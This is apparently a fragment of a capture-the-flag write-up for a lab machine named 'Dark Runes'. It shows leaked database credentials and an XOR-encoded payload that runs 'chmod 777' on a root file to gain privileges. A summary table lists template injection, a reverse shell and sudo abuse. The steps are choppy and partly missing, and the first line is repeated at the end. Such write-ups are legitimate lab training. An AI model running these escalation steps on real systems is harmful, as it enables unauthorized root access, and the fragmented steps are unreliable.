Land in /var/www/darkrunes . Find config.py with PostgreSQL creds: db_user: rune_walker , db_pass: s3cr3t_run3s . Access DB:
echo -n "RUNECMD:chmod 777 /root/root.txt" > payload python3 -c 'print("".join(chr(ord(c) ^ 0x42) for c in open("payload").read()))' > /tmp/evil.rune Move to /var/runes/evil.rune and run: htb dark runes
Root flag acquired. 🏴☠️ | Phase | Technique | |-------|------------| | Web | Base64 rune encoding, token reuse, SSTI (Jinja2) | | Shell | Python reverse shell, PostgreSQL access | | Priv Esc | Custom binary analysis, XOR encryption bypass, sudo abuse | 🧙 Final Rune Reading Dark Runes is a love letter to CTF players who enjoy creative encoding, sneaky template injection, and low-level binary trickery. It rewards patience and curiosity—traits of a true digital rune mage. Land in /var/www/darkrunes